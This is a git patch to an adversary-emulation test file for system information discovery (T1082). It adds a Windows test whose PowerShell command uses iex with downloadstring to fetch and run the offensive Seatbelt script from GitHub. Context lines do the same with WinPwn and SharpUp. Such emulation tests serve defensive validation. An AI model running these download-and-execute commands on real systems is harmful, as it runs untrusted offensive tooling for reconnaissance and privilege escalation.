From 7f14e048e0efc698df7db6870d46f7ee458007df Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Thu, 12 May 2022 18:53:54 -0500 Subject: [PATCH] Update T1082.yaml (#1951) * Update T1082.yaml PowerSharpPack - Seatbelt technique via function of WinPwn performing Local Privileges escalation * Update T1082.yaml * Update T1082.yaml Co-authored-by: Carrie Roberts --- atomics/T1082/T1082.yaml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml index 089c1893..5b120108 100644 --- a/atomics/T1082/T1082.yaml +++ b/atomics/T1082/T1082.yaml @@ -239,6 +239,7 @@ atomic_tests: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') RBCD-Check -consoleoutput -noninteractive name: powershell + - name: WinPwn - PowerSharpPack - Watson searching for missing windows patches auto_generated_guid: 07b18a66-6304-47d2-bad0-ef421eb2e107 description: PowerSharpPack - Watson searching for missing windows patches technique via function of WinPwn @@ -259,3 +260,16 @@ atomic_tests: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1') Invoke-SharpUp -command "audit" name: powershell + +- name: WinPwn - PowerSharpPack - Seatbelt + description: |- + PowerSharpPack - Seatbelt technique via function of WinPwn. + + [Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. + supported_platforms: + - windows + executor: + command: |- + iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1') + Invoke-Seatbelt -Command "-group=all"; pause + name: powershell